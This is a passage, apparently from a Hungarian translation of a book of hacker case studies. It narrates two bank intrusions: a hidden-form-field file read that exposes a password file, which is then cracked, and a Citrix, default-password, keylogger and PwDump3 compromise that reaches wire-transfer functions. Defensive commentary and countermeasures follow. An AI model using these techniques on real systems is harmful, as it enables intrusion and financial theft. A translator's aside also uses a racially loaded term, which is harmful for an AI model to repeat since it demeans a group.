lakásukból egy a külvárosban levő saját házba tudjanak költözni. És
arról álmodnak, hogy egy „megbízható import autót vezethessenek”.
Valójában rengeteg embernek van kocsija, és egyre többen költöznek
saját házba, „szóval a helyzet évről évre jobb”. Az ország a technológia
szempontjából sem elmaradt terület, magyarázza Juhan:
Észtország már a kilencvenes évek elején elkezdte kiépíteni az
elektronikus bank használatához, ATM-ekhez és internetes banki
műveletekhez szükséges infrastruktúrát, amely ma kifejezetten modern.
Több észt társaság van, amely más európai országoknak biztosítja a
számítógépes technológiát és szolgáltatásokat.
Azt gondolhatnánk, hogy ez a hackerek paradicsoma: az Internet
használata mindenfele, és a biztonság szintje valószínűleg ettől jócskán
elmaradt. Juhan szerint azonban ez nem egészen így van:
Ami az Internet-biztonságot illeti, általánosságban jónak tekinthető,
annak köszönhetően, hogy az ország és a közösségek annyira kicsik. A
szolgáltatók viszonylag kényelmesen vezethetnek be új technológiákat.
És ami a pénzügyi szektort illeti, Észtországban sosem fejlődött ki a
banki csekkek rendszere – azon csekkeké, amelyeket az amerikaiak
mindenféle vásárlásaik során fizetésre használnak.
Nagyon kevés észt jár a bankfiókba, mondja. – A legtöbb embernek
van folyószámlája, de nem tudják, hogy néz ki egy banki csekk.
Nem azért, mert közömbösek a pénzügyeik iránt, hanem azért, mert
– ezen a területen legalábbis – az amerikaiak előtt járnak, ahogy azt
Juhan meséli:
A bankoknak soha nem voltak nagy fiókhálózatai. Már a kilencvenes
évek elején elkezdtük kiépíteni az elektronikus és internetes banki
műveletek infrastruktúráját. Az emberek és a vállalkozások 90-95
százaléka az Internet segítségével végzi a banki átutalásokat.
És hitelkártyákat vagy az európai szóhasználatnak megfelelően
„bankkártyákat” is használnak.
A közvetlen fizetéseket sokkal kényelmesebb az internetes banki
műveletek vagy a bankkártyák használatával rendezni, és egyszerűen
nincs miért csekket használni. Amerikával ellentétben itt majdnem
mindenki az Internetet használja banki ügyei intézésére és a számlái
kifizetésére.

A Perogie Bank

Juhan 10 éves kora óta foglalkozik komolyan a számítógépekkel,


azonban nem tekinti magát hackernek, csak egy a biztonsággal
foglalkozó fehérkalaposnak. Az interjúkészítés nem jelentett problémát
– az általános iskola második osztályában kezdett angolul tanulni. A
fiatal észt sokat utazott és tanult külföldön, így rengeteg lehetősége volt
az angol beszélgetési fordulatok elsajátítására.
Pár éve kifejezetten kemény tél volt Észtországban, sarkvidéki
hideggel, mindenfelé hóbuckákkal és mínusz 25 Celsius fok alatti
hőmérséklettel. Annyira csípős volt az idő, hogy még a kemény
telekhez szokott helyiek sem mentek ki szívesen az utcára, csak ha
feltétlenül szükséges volt. Ez az időjárás a legjobb alkalom egy a
képernyőjéhez ragadt számítógéprajongó számára, hogy a figyelmét
felkeltő célpont után vadásszon.
Pontosan ezt tette Juhan, amikor egy a történetben Perogie Banknak
nevezett pénzintézet weboldalába botlott bele. Vizsgálódásra érdemes
célpontnak látszott.
Beléptem az interaktív GYIK oldalra, ahol kérdéseket tehetnek fel a
felhasználók. Szokásom, hogy belenézek a weboldalak űrlapjainak
forráskódjába. Csak eljutok egy weboldalra, és egyszerűen belenézek.
Magad is ismered ennek a módját – szörfölgetsz, és minden stratégiai
cél nélkül böngészel.
Látta, hogy Unix által használt fájlrendszer volt. Ez azonnal
leszűkítette a kipróbálásra érdemes támadástípusok körét. Több
weboldal forráskódjának megtekintésével feltárt egy fájlnévre mutató
rejtett változót. Amikor megpróbálta kicserélni a rejtett űrlapelemben
tárolt értéket, „világossá vált, hogy ehhez semmilyen hitelesítést nem
kértek. Így a bank szerverének mindegy volt, hogy az inputot egy banki
oldalról vagy egy helyi PC-ról küldtem el.” – mondta.
Úgy változtatta meg a rejtett űrlapelem tulajdonságait, hogy az elem
a jelszófájlra mutasson, ami lehetővé tette számára a jelszófájl
képernyőn való megjelenítését. Felfedezte, hogy a jelszavak nem
voltak egy másik, csak rendszergazdai jogosultságokkal olvasható
fájlba másolva (shadowed), ami azt jelentette, hogy a számítógépe
kijelzőjén minden egyes felhasználói névhez tartozó jelszó látható volt
szabványosan titkosított formában. Ily módon képes volt a titkosított
jelszavakat letölteni, és egy jelszótörő programon átfuttatni.
A Juhan által választott jelszócracker program a jól ismert, igen
szórakoztató nevű „John the Ripper” (Hasfelmetsző Jack) volt, amit
egy hagyományos angol szótár használatával futtatott. Miért angolt,
miért nem észtet használt? – Gyakori szokás itt az angol jelszavak
használata – mondja. Mindenesetre tény hogy sok észtnek van jó
alapszintű angoltudása.
A cracker program futtatása nem tartott sokáig, csupán körülbelül 15
percet vett igénybe a PC-jén, mivel a jelszavak alapszintűek voltak –
egyszerű angol szó, néhány odabiggyesztett számmal a végén. Az
egyik maga volt az aranytojást tojó tyúk: megszerezte a rendszergazdai
jogosultságokat biztosító jelszót is. És még mindig nem volt vége:
Van ez a telebank szolgáltatás, amelynek a nevét gondolom, nem
kellene itt megemlítenem, de a lényeg, hogy találtam egy accountot
ehhez a szolgáltatáshoz. Úgy nézett ki, hogy ez valószínűleg a
szolgáltatást az ezen a szerveren futtató rendszeraccount.
Ebben az irányban nem ment tovább, mivel „amint megvoltak a
jelszavak, megálltam”. A játék neve elővigyázatosság volt.
Bajba kerülhettem volna. Végtére is az információbiztonsági
iparágban dolgozom. Jó okom volt arra, hogy ne tegyek kárt.
A helyzet túl szépnek tűnt ahhoz, hogy igaz legyen. Azt gondoltam,
hogy ez egy mézesbödön is lehet, egy csapda, hogy átverjék az olyan
embereket, mint én, majd bíróság elé állítsák őket. Ezért kapcsolatba
léptem a főnökeimmel, ők pedig jelentették az esetet a banknak.
Az eset feltárása nem hozta kellemetlen helyzetbe sem a
munkaadója, sem a bank előtt, sőt, pontosan az ellenkezője történt. A
cége megbízást kapott, hogy vizsgálódjanak tovább, és álljanak elő
valamilyen megoldással a rés betömésére. Juhan cége őt bízta meg a
feladattal, mondván, biztosan be tudja fejezni azt, amit elkezdett.
Bizonyos módon meglepővolt számomra, hogy az események így
alakultak, mert az Internet-biztonság Észtországban jobb szinten áll,
mint bárhol másutt. Ezt nem csak én mondom, hanem sok olyan ember,
akik más helyekről érkeztek ide. Ezért volt meglepőfelfedezni ezt a
lyukat, majd azt tapasztalni, hogy milyen könnyen hozzájutok a nagyon
bizalmas adatokhoz.

Személyes vélemény

Az ilyen tapasztalatokból vonta le Juhan azt a következtetést, hogy


ha egy vállalat azzal szembesül, hogy a rendszerét egy hacker feltörte,
akkor jár el leginkább a saját érdekeinek megfelelően, ha nem feljelenti
a hacken, hanem vele együttműködve kijavítja az általa felfedezett
hibákat – egyfajta „ha nem tudod legyőzni, csatlakozz hozzá” filozófia
alapján. A hivatalos szervek persze általában nem osztják ezt a
szemléletet, amit Adrian Lamo meghurcolása is bizonyít (lásd az 5.
fejezetet: A Robin Hood hacker), akit annak ellenére elítéltek, hogy
(többnyire) közcélú szolgálatot látott el azzal, hogy tanácsokat adott a
cégeknek sebezhetőségeikkel kapcsolatban. A feljelentésből nehéz jól
kijönni, különösen akkor, ha a cég nem tudja meg, hogy milyen
konkrét sebezhetőségek kiaknázásával szivárgott be a hacker a
hálózatba.
A cégek feltétlen reflexből tűzfalat tűzfalra halmoznak, azonban ez a
megközelítés teljes mértékben figyelmen kívül hagyja a rafinált
hackerek által minden bizonnyal majdan felfedezendő réseket, nem
beszélve a hackerközösség által már jelen pillanatban is ismert
sebezhetőségekről. Juhan rendkívül tömören fogalmazza meg az ezzel
kapcsolatban kialakult nézetét:
Ha megpróbálod a rendszereidet bolondbiztossá tenni, mindig lesz
egy nálad találékonyabb bolond.
A TÁVOLSÁGI BANKHACKELÉS

Gabriel anyanyelvként beszéli a franciát, és egy apró kanadai


városban él. Noha fehérkalapos hackerként mutatja be magát, és ostoba
tettnek tartja a becsapást, elismeri, hogy „egyszer-kétszer, amikor már
kétségbeesésig untam magam, én is elkövettem”, illetve amikor olyan
oldalt talált, ahol „a biztonság szánalmasan rossz volt, valakinek meg
kellett őket leckéztetnie”.
De hogyan jut el a kanadai vidéken élő fickó oda, hogy az Egyesült
Államok egyik déli államában, a Dixie szívében levő bankot
meghackelje? (A Dixie az USA-nak a Mason-Dixon vonaltól
[Pennsylvania déli határától] délre eső területe, amelyben a négerek
többsége él.) Talált egy weboldalt, amely azt mutatta, hogy „milyen IP-
cím tartományok (netblockok) vannak az adott szervezeteknek
kiosztva”.[1] A listában rákeresett „az olyan szavakra, mint
kormányzat, bank és ehhez hasonlók”, és a keresés mindig egy IP
tartományt adott eredményül (például 69.75.68.1-től 69.75.68.254-ig),
amit aztán letapogatott.
Az egyik, szinte véletlenül megtalált IP-cím egy déli államban levő
bankhoz tartozott. Ez indította el Gabrielt azon az úton, amelyből egy
alapos hackelés lett.

Hackernek nem születsz, hanem azzá válsz

Tizenötéves korában (ami – mint azt a korábbi fejezetekből látjuk –


késői kezdésnek számít, olyasmi, mintha valaki a középiskolában
kezdene kosarazni és bejut az NBA-be) Gabriel az olyan játékok, mint
a Doom mellett elkezdett egy barátjával hackelgetni. Mivel akkoriban
128 MB-os merevlemezű 386-os számítógépe volt, Gabriel – egy 15
éves srác szemszögéből nézve – egy vagyont költött el a helyi
számítógépes kávézóban, hálózati játékokkal játszva.
A számítógépek világa édes megváltás volt a középiskolára jellemző
állandó nyers versenyzés után, ahol Gabriel nap mint nap társai állandó
ugratásának volt kitéve, pusztán azért, mert ő másmilyen volt. Nem
segített az sem, hogy ő volt az osztályban a legfiatalabb és az új fiú, aki
egy másik megyében kezdte meg az iskolát, mielőtt szülei ideköltöztek
volna. Senki sem állítja, hogy könnyű geeknek lenni. (A geek magyarul
körülbelül kockafejet jelent, olyan valakire használják, aki az átlagnál
nagyobb érdeklődést mutat a technika, elsősorban a számítógépek
iránt.)
Szülei, akik mindketten az államigazgatásban dolgoztak, nem tudták
megérteni a fiuk számítógépek iránti mániákus ragaszkodását, ez
azonban gyakori probléma a mai generációnál. – Soha nem akarták,
hogy számítógépet vegyek – emlékszik vissza Gabriel. Ehelyett azt
szerették volna, hogy „menjek ki a szabadba és csináljak valami mást”.
Az apa és az anya annyira aggódtak a fiuk miatt, hogy pszichológushoz
küldték; segítsen „normálissá tenni” őt. Bármi is történt az orvos
rendelésein, nem vezetett eredményre a nyurga tinédzsernél, aki nem
adta fel a számítógépek iránti szenvedélyét.
Gabriel Cisco tanfolyamon vett részt a helyi kereskedelmi főiskolán.
A teljes mértékben autodidakta fiú sokszor többet tudott a tanároknál,
akik néha ráhagyták a bonyolult magyarázatokat. A most 21 éves
kanadai olyanfajta hackertehetséggel rendelkezik, amely lehetővé teszi
számára, hogy saját maga fedezze fel a dolgokat. Még akkor is, ha
mások által már jól ismert dologra jön rá, ez a képesség különbözteti
meg őt azoktól a „szkriptkölyköktől”, akik semmit nem fedeznek fel,
csak a webről letöltött dolgokat használják.
Egyik kedvelt programja a Lantern Keylogger. Ez is egyike azoknak
a programoknak, amelyek képesek az embereket munkájuk közben
elektronikusan lehallgatni, így lehetővé teszik a hackerek számára,
hogy a célpont számítógépes rendszerén begépelt minden leütést
megfigyeljenek – azzal a különbséggel, hogy ez a program állítólag
teljesen láthatatlan a célpont számítógépén.
Ezen túlmenően egy Citrix MetaFrame nevű alkalmazás (ez egy
kereskedelmi forgalomban kapható, vállalati gépekhez való hozzáférést
biztosító programcsomag) „követő” funkcióját használta, amit azért
hoztak létre, hogy a rendszergazdák figyelhessék a vállalat
alkalmazottait, és szükség esetén támogatást adjanak nekik. A követő
funkció segítségével a rendszergazda titokban átpillanthat a felhasználó
válla felett, és a saját képernyőjén láthatja, amit a felhasználó éppen
csinál vagy begépel, sőt még akár át is veheti a számítógépe felett az
irányítást. Az ügyes hacker, ha Citrixet futtató céget talál, képes
ugyanerre: átveszi a számítógépek felett az irányítást. Ez nyilvánvalóan
komoly elővigyázatosságot igényel. Ha nem figyel, működését
észreveszik, hiszen bárki ül a gép előtt, látni fogja a hacker lépéseinek
az eredményét (mozgó egérmutató, megnyíló alkalmazások, és így
tovább.) De a lehetőség ártalmatlan viccelődésre is alkalmat ad a
hackernek.
Látom, ahogy az emberek e-maileket írnak a feleségüknek, vagy
valami hasonlót csinálnak. Mozgatni tudom a képernyőjükön az egeret.
Igen szórakoztató.
Egyszer rámentem egy fickó számítógépére, és mozgatni kezdtem az
egérmutatóját. Amikor megnyitott egy jegyzettömb fájlt, begépeltem
neki, hogy „Hey”
Természetesen a hacker, ha át kívánja venni valakinek a számítógépe
felett az irányítást, rendszerint olyan időpontot választ, amikor az a
valaki nincs a gép előtt. – Én általában éjfél után szoktam csinálni –
magyarázza Gabriel –, hogy biztosan senki ne legyen ott. Vagy
egyszerűen ellenőrzőm a képernyőjüket. Ha a képernyővédő fut, akkor
az általában az jelenti, hogy senki nincsen a számítógépnél.
Egyszer azonban rosszul ítélte meg a helyzetet, és a felhasználó a
gépénél ült. A „Tudom, hogy nézel engem!” mondat jelent meg Gabriel
kijelzőjén. – Azonnal kijelentkeztem – mondja. Egy másik alkalommal
megtalálták a jól elrejtett fájljait. – Kitörölték őket, és egy üzenetet
hagytak nekem: „BÍRÓSÁG ELÉ JUTTATJUK, ÉS AMENNYIRE
CSAK ENGEDI A TÖRVÉNY, MEGBÜNTEITETJÜK.”

A banki betörés

Amikor Gabriel Interneten való böngészései során az amerikai bank


IP-címének részleteibe botlott bele, követte a nyomot, és felfedezte,
hogy nem egy kisvárosi bankot, hanem egy országos hálózattal és
nemzetközi kapcsolatokkal rendelkező pénzintézetet talált meg. Sőt, mi
több, azt fedezte fel, hogy a bank egyik szerverén a Citrix MetaFrame
futott, amely a felhasználóknak saját munkaállomásukhoz távoli
hozzáférést biztosító szerverszoftver. Hirtelen eszébe jutott valami,
amit egy barátjával korábbi hackelési tevékenységük során
tapasztaltak.
Ezzel a barátommal felfedeztük, hogy a Citrix szolgáltatásokat
futtató rendszerek többségén nincsenek jó jelszavak. Már bekapcsolva
szállítják őket, azonban jelszó nélkül hagyják a végfelhasználókat.
Gabriel egy portszkennerrel folytatta a munkát. Ez egy olyan
hackereszköz (vagy – a felhasználó szándékaitól függően – auditáló
eszköz), amely a hálózatba kötött számítógépeket letapogatva nyitott
portokat azonosít. Kifejezetten olyan rendszerek után kutatott,
amelyeken az 1494-es port nyitva van, mert ezt a portot használták a
Citrix terminálszolgáltatások távoli elérésére, így minden olyan
rendszer, amelyen nyitva volt az l494-es port, potenciálisan
„kisajátítható” rendszer volt.
Ahányszor ilyet talált, a számítógépen levő összes fájlban rákeresett
a jelszó szóra. Ez olyan, mint aranyat mosni. Az esetek többségében
üres kézzel fejezed be, de alkalmanként találsz egy aranyrögöt. Jelen
esetben az aranyrög egy olyan emlékeztető lehet, amit valaki egy
fájlban helyezett el, és valami olyasmit mond, mint a „rendszergazdai
jelszó a mail2-höz, „happyday”.
Idővel megtalálta a bank tűzfalának jelszavát. Megpróbált
csatlakozni egy routerhez, hiszen tudta, hogy néhány elterjedt router
alapértelmezetten az „admin” vagy az „administrator” jelszavakat
használja, és sokan – nem csak a gyanútlan otthoni felhasználók, de
még az IT support szakemberek is – az alapértelmezett jelszó
megváltoztatása nélkül helyezik üzembe az új eszközöket. És pontosan
így volt ez ebben az esetben is – talált egy routert alapértelmezett
jelszóval.
Amint sikerült hozzáférést szereznie, hozzáadott a tűzfalhoz egy
szabályt, amely engedélyezte az 1723-as porton a bejövő
kapcsolódásokat – ezt a portot használják a Microsoft Virtual Priváté
Network (Virtuális Magánhálózat – VPN) szolgáltatásai, amelyeket
azért alakítottak ki, hogy a jogosult felhasználók céges hálózathoz való
biztonságos csatlakozását biztosítsák. Miután sikeresen hitelesítette
magát a VPN szolgáltatáshoz, egy IP-címet kapott a számítógépe a
bank belső hálózatán. Szerencséjére a hálózat „egyszintű” volt, ami azt
jelenti, hogy az összes rendszer elérhető volt egyetlen hálózati
szegmensből, így már egyetlen számítógépbe való betörés hozzáférést
adott neki az ugyanazon a hálózaton levő többi számítógépes
rendszerbe is.
A bankba való hackelés Gabriel elmondása szerint olyan könnyen
ment, hogy az már „szinte unalmas volt”. A bank biztonsági
tanácsadókat alkalmazott, akik munkájuk végeztével jelentést adtak le.
Gabriel megtalálta az egyik szerveren ezt a jelentést. A csapat által
feltárt összes biztonsági sebezhetőséget tartalmazta – hasznos útmutató
volt a rendszer többi részének feltárásához.
Szerverként a bank egy IBM AS/400-as gépet használt; Gabrielnek
kevés tapasztalata volt ezzel a típussal. Ám felfedezte, hogy a
Windows domain szerver a rendszeren használt összes alkalmazás
teljes felhasználói kézikönyvét tartalmazta, amit le is töltött onnan.
Amikor ez után begépelte az „administrator” szót – az alapértelmezett
IBM jelszót a rendszer beengedte.
Azt mondanám, hogy az ott dolgozó emberek 99 százaléka a
„passwordl25” jelszót használta. Nem volt a háttérben futó
vírusszűrőalkalmazásuk sem. Gondolom, talán hetente egyszer, ha
lefuttatták.
Gabriel nyugodtan telepíteni merte a Spy Lantern Keyloggert, a
kedvenc billentyűzetnapló programját, amelyet elsősorban a program
azon egyedülálló képessége miatt szeretett használni, hogy a Citrix
szerverre egyszerre bejelentkező akárhány felhasználó információit
képes volt feljegyezni. Amikor ezt telepítette, várt, amíg a
rendszergazda be nem jelentkezett, és el nem csípte a jelszavát.
A megfelelő jelszóval felfegyverezve Gabriel megütötte a
főnyereményt, ami jelen esetben az AS/400-on futó kritikus
alkalmazásokhoz való teljes körű online felhasználói útmutatók
formájában hullott az ölébe. Minden olyan műveletet végre tudott
hajtani, amit egy pénztáros: utalás, az ügyfelek felhasználói adatainak
megtekintése és megváltoztatása, az országban levő összes ATM
tevékenységének nyomon követése, bankkölcsönök és átutalások
ellenőrzése, hozzáférés az Equifax (egy adósminősítő cég) adataihoz,
sőt, még a háttérellenőrzéseket tartalmazó bírósági fájlokat is elérte.
Arra is rájött, hogy a bank oldaláról hozzáfér az állami
Közlekedésfelügyelet számítógépes adatbázisához.
Ezt követően jelszó hash-eket kívánt megszerezni az elsődleges
tartományvezérlőből (PDC), amely a domainhez érkező bejelentkezési
kéréseket hitelesíti. Ehhez a PwDump3 programot választotta, amely a
rendszer registry védett részéből kivonatolja az összes jelszó hash-t.
Rendszergazdai hozzáférést szerzett a gépre, majd egy kis szkript
hozzáadásával a startup mappában levő parancsikonként futtatta a
PwDump3-at, ártalmatlan kis valamiként elrejtrve azt.
Gabriel arra várt, hogy egy domain rendszergazda bejelentkezzen a
célgépre. A program egy időzített bombához hasonlóan működik, amit
egy adott esemény élesít be – jelen esetben a rendszergazda
bejelentkezése volt ez az esemény. Amikor a rendszergazda
bejelentkezik, a jelszó hash-ek csendesen kivonatolódnak egy fájlba. A
PwDump3 alkalmazás a rendszergazda startup mappájából van
futtatva. – Néha napokig tart [amíg a rendszergazda bejelentkezik] –
mondja –, de megéri várni.
Amint a gyanútlan rendszergazda bejelentkezett, tudtán kívül egy
rejtett fájlba kivonatolta a jelszó hash-eket. Gabriel visszatért a bűntény
színhelyére, hogy megszerezze a jelszó hash-eket, és a számára
elérhető legnagyobb teljesítményű számítógépen lefuttatta a
jelszófeltörő programot. Egy ilyen rendszeren kevesebb mint egy
másodpercig tart feltörni egy olyan jelszót, mint a „password”. A
Windows-os jelszavak általában különösen egyszerűek, míg a
különleges karaktereket tartalmazó jelszavak feltörése sokkal tovább is
eltarthat. – Egyszer egy olyan jelszóval találkoztam, amelynek egy
teljes hónapig tartott a feltörése – emlékszik vissza szomorú arccal. A
bank rendszergazdájának jelszava négy kis betűből állt. Gyorsabb volt
feltörni, mint ezt a bekezdést elolvasni.

Érdekel valakit egy svájci bankszámla?

Gabriel olyan dolgokat talált, amelyek mellett a betörés összes többi


részlete eltörpült.
A pénzintézetek működésének egyik legtitkosabb részéhez – az
átutalások feldolgozásához – talált utat. Megtalálta az átutalási
folyamat megindításához használandó menürendszert. Felfedezte azt az
online űrlapot is, amelyet a tranzakciók kezdeményezésére jogosult
alkalmazottak szűk köre arra használt, hogy az ügyfél számláját
megterhelje a megfelelő összeggel, majd elektronikusan egy másik
bankba küldje azt – egy másik pénzintézetbe, amely lehet, hogy a világ
másik végén van (például Svájcban).
Egy üres űrlappal semmit nem lehet kezdeni, ha nem tudjuk, hogy
kell azt helyesen kitölteni. Mint kiderült, ez sem jelentett Gabriel
számára problémát. A korábban megtalált felhasználói kézikönyvben
az egyik fejezet igen érdekesnek bizonyult. Nem kellett sokat lapoznia,
hogy megtalálja, amire szüksége volt.
20.1.2 Átutalások bevitele/frissítése
Menü: Átutalás (WIRES)
Menüpont: Átutalások bevitele/frissítése
Ezt a menüpontot a nem rendszeres átutalások bevitelére, illetve a
beviendő és elküldendő ismétlődő átutalások kiválasztására használjuk.
A nem rendszeres átutalásokat olyan ügyfelek használják, akik
alkalmanként hajtanak végre utalást, illetve olyan nem ügyfelek veszik
igénybe, akik utalást kívánnak kezdeményezni. Ebben a menüpontban
a bejövő utalásokat is kezelni lehet, ha azok előzetesen már fel lettek
töltve. A menüpont kiválasztásakor a következő képernyő jelenik meg.
Wire Transfers
Wire Transfers 11:35:08
Outgoing
Type options, press Enter.
2=Change 4=Delete 5=Display Position to...
Opt From account To beneficiary Amounr F3=Exit F6=Add
F9=Incoming F12=Previous
A menüpont első kiválasztásakor egyetlen átutalás sem lesz
kilistázva. Átutalás hozzáadásához nyomja meg az F6=Add billentyűt,
és a következő képernyő fog megjelenni.
A teljes fejezet lépésről lépésre szóló pontos utasításokat
tartalmazott az adott bankból indítandó utalások végrehajtására, illetve
a pénz egy ügyfél számlájáról egy másik pénzintézethez való
továbbítására. Gabriel mindent tudott, amire az átutalás
végrehajtásához szüksége volt. Kezében volt a mennyország kulcsa.

Utóhang

A bank rendszeréhez való széles körű hozzáférése és a


rendelkezésére álló tág jogkörök ellenére Gabriel – állítása szerint –
távol tartotta kezeit a kasszától. Semmilyen érdeke nem fűződött a
lopáshoz vagy a bank bármely információinak megmásításához, noha
eljátszott a gondolattal, hogy feljavítja egyes haverjainak a
hitelminősítését. A helyi főiskola biztonsági képzésére beiratkozott
diákként ösztönösen értékelte a bank védőintézkedéseinek
gyengeségeit.
Rengeteg dokumentumot találtam a szervereiken a fizikai
biztonságról, de azok egyike sem kapcsolódott a hackerekhez. Találtam
ugyan valamit a szerverek ellenőrzésére minden évben felbérelt
biztonsági tanácsadók jelentéséből, de az nem elég egy bank számára.
Jó munkát végeztek a fizika biztonság területén, ám ez kevés a
számítógépes biztonsághoz.
BETEKINTÉS

Az észt bank weboldala könnyű célpont volt. Juhan akkor vette észre
a hibát, amikor megtekintette a bank weboldalának forráskódját. A kód
egy rejtett űrlapelemet használt, amely egy űrlapsablon fájlnevét
tartalmazta. Ezt az elemet töltötte be a CGI-szkript, és ez jelent meg a
felhasználók böngészőjében. Megváltoztatta a rejtett változót, hogy az
a szerver jelszófájljára mutasson, és hoppá, a jelszófájl jelent meg a
böngészőben. Elképesztő módon a fájl nem volt úgy védve, hogy csak
rendszergazdai jogosultságokkal legyen olvasható, így hozzáfért az
összes titkosított jelszóhoz, amelyeket később fel is tört.
Az amerikai bank meghackelése újabb példa a mélységi védekezés
szükségességére. A történetben szereplő bank hálózata egy szintűnek
tűnt; ez azt jelenti, hogy az egyetlen Citrix szerver mögött nem volt
jelentős védelem. Ha a támadó a hálózaton levő bármely rendszert
feltörte, a hálózaton levő összes rendszerhez csatlakozni tudott. A
mélységi védekezés modellje megakadályozta volna, hogy Gabriel
hozzáférést szerezzen az AS/400-hoz.
A bank információbiztonsági személyzete a biztonság csalóka
érzésébe ringatta magát a külső auditálás elvégeztetése után, amely
valószínűleg túlságosan is megnövelte az általános biztonsági
helyzetükbe vetett hitüket. Noha egy biztonsági elemzés vagy auditálás
végrehajtása a támadásokkal szembeni ellenálló képesség mérésének
fontos lépése, ennél is fontosabb a hálózat és a rajta levő rendszerek
megfelelő kezelése.

ÓVINTÉZKEDÉSEK

Az online banki oldal esetében meg kellett volna követelni, hogy


minden webes alkalmazásfejlesztő bizonyos alapvető
programozásbiztonsági irányelveket kövessen, vagy pedig minden
beépített kódot ellenőrizni kellett volna. A legjobb gyakorlat a szerver
oldali szkriptnek küldött felhasználói input mennyiségének a
korlátozása. A bedrótozott (hard-coded) fájlnevek és állandók
használata, mivel nem árulkodóak, növelik az alkalmazás biztonsági
szintjét.
Ebben az esetben a laza rendszerfelügyelet és a Citrix szervert
jellemző gyenge jelszóbiztonság voltak a legnagyobb hibák. Ha ezeket
nem követik el, akkor valószínűleg megelőzhették volna, hogy Gabriel
szabadon barangoljon a hálózatukon, billentyűzetnaplózókat és trójai
programokat telepítsen. A hacker írt egy rövid kis szkriptet, és a
rendszergazda startup mappájába tette, így amikor az bejelentkezett,
csendesen lefuttatta a pwdump3 programot. Természetesen korábban
már rendszergazdai jogosultságokat szerzett. A hacker arra várt, hogy a
rendszergazda bejelentkezzen, kicsikarhassa belőle a jogosultságait, és
automatikusan letöltse a jelszó hash-eket az elsődleges
tartományvezérlőből. A rejtett szkriptet gyakran trójainak vagy
csapóajtónak (trapdoor) nevezik.
A szóba jöhető óvintézkedések – a teljesség igénye nélkül – a
következők:
Ellenőrizzük felhasználói jelszavak utolsó beállításának az idejét a
rendszerszolgáltatásokhoz tartozó, normál alkalmazottaknak nem
kiosztott felhasználói nevek esetén, kutassunk jogosulatlan
rendszergazdai jogok, jogosulatlan csoportjogosultságok és az utolsó
bejelentkezés időpontja után. Ezek a rendszeres ellenőrzések
segíthetnek a biztonsági támadások azonosításában. Keressünk furcsa
időpontban beállított jelszavakat, hiszen a hacker nem biztos, hogy
észreveszi, hogy a jelszó megváltoztatásával nyomot hagy.
Korlátozzuk az interaktív bejelentkezéseket a normál üzleti órák
idejére.
Kapcsoljuk be a be– és kijelentkezési auditálást minden olyan
rendszeren, amelyek külsőleg elérhetők vezeték nélküli, betárcsázós.
Internet vagy extranet kapcsolaton keresztül.
Alkalmazzunk a jogosulatlanul elhelyezett billentyűzetnaplózók
észlelésére olyan szoftvert, mint például a SpyCop (elérhető a
www.spycop.com oldalon).
Legyünk éberek, és telepítsük az összes biztonsági frissítést.
Bizonyos környezetekben be lehet állítani a legújabb frissítések
automatikus letöltését. A Microsoft arra ösztönzi ügyfeleit, hogy ennek
megfelelően állítsák be számítógépes rendszereiket.
Vizsgáljuk át a külsőleg elérhető rendszereket olyan távvezérlést
lehetővé tevő szoftverek után, mint a WinVNC, a TightVNC, a
Damware, és így tovább. Ezek a programok, noha legális módon is
használhatóak, lehetővé tehetik a támadónak, hogy távolról
megfigyelje és vezérelje a rendszert.
Gondosan ellenőrizzünk le a Windows Terminál Services-t vagy a
Citrix MetaFrame-et használó minden bejelentkezést.
A legtöbb támadó ezeket a szolgáltatásokat használja távoli vezérlés
esetén a lebukás kockázatának csökkentésére.

ZÁRÓJELBEN

Az ebben a fejezetben bemutatott hackelések egyszerűek voltak, a


cégek gyenge jelszóbiztonságán és sebezhető CGI-szkripteken
alapultak. Noha sokan, köztük a számítógépes biztonságról a legtöbbet
tudó szakemberek is hajlamosak úgy gondolni a hackerek betöréseire,
mint az „Oceans Eleven” filmben látható stratégiai támadásra, a
szomorú igazság az, hogy e támadások nagy többsége egyáltalán nem
zseniális vagy különösebben okos. Azért lehetnek sikeresek, mert a
céges hálózatok jelentős része nem megfelelően védett. Az e
rendszerek fejlesztéséért és üzembe helyezésért felelős szakemberek
egyszerű konfigurációs és programozási hibákat követnek el, amelyek
lehetőséget teremtenek a bejárati ajtón naponta ezrével dörömbölő
hackereknek.
Ha a fejezetben bemutatott két pénzintézet megfelelően reprezentálja
a többi bank információvédelmi tevékenységét, akkor lehet, hogy
mindannyian jobban járunk, ha a pénzünket a párnánk alatt tartjuk.

JEGYZETEK

1. Noha konkrétan nem említette meg az oldalt, az információ


elérhető itt: www.flumps.org/ip/.

8. fejezet

A szellemi tulajdon sincs biztonságban


Ha az egyik dolog nem működik, megpróbálkozom valami mással,
mert tudom, hogy van valami, ami működni fog. Mindig van valami,
ami működik. Csak meg kell találni, hogy mi az.
Erik
Mi egy szervezet legértékesebb eszköze? Nem a számítógépes
hardver, nem az irodák vagy a gyár, és még csak nem is az, amit az
egykor népszerű vállalati közhely állít: „A legnagyobb értéket az
alkalmazottaink jelentik.”
Az egyszerű tény az, hogy ezek mindegyike helyettesíthető.
Elismerem, nem könnyen, nem küzdelem nélkül, de számtalan cég
túlélte már, hogy üzeme leégett, vagy egy halom meghatározó
alkalmazottja sétált ki az ajtón. A szellemi tulajdon elvesztéséből való
kilábalás azonban már egy teljesen más történet. Ha valaki ellopja a
termékdesignt, az ügyféllistát, az új termék terveit, az R&D adatokat –
ezek mindegyike a cég bukásához vezethet.
Ráadásul, ha valaki eltulajdonít ezer darab terméket a raktárunkból,
egy tonna titániumot a gyárunkból vagy száz számítógépet az
irodánkból, azt azonnal tudni fogjuk. Ha valaki elektronikus úton
ellopja a szellemi tulajdonunkat, csupán egy másolatot lop el, és csak
akkor (vagy soha nem) fogunk tudomást szerezni erről, amikor a kár
már megtörtént, és elszenvedtük a következményeket.
Talán nyomasztó a hír, hogy hackelési képességekkel felvértezett
emberek nap mint nap szellemi tulajdont lopnak – igen gyakran olyan
cégektől, amelyek valószínűleg nem kevésbé biztonságtudatosak, mint
az ön saját cége, ahogy ezt a fejezetben szereplő két példa is
alátámasztja majd.
A következő két történetben szereplő két srác a crackernek nevezett
különös fajhoz tartozik; a kifejezés olyan hackerekre utal, akik
kereskedelmi forgalomban kapható alkalmazások visszafejtésével vagy
ezen programok forráskódjának vagy licencelési kódjának ellopásával
törik fel (crackelik) a szoftvereket, és ezáltal ingyenesen használhatják
vagy terjeszthetik ezeket a szoftvereket az alvilági crackelő oldalak
labirintusában. (A cracker szó e jelentése nem összekeverendő azzal,
amikor a kifejezést a jelszófeltörő „cracker” programokra használjuk.)
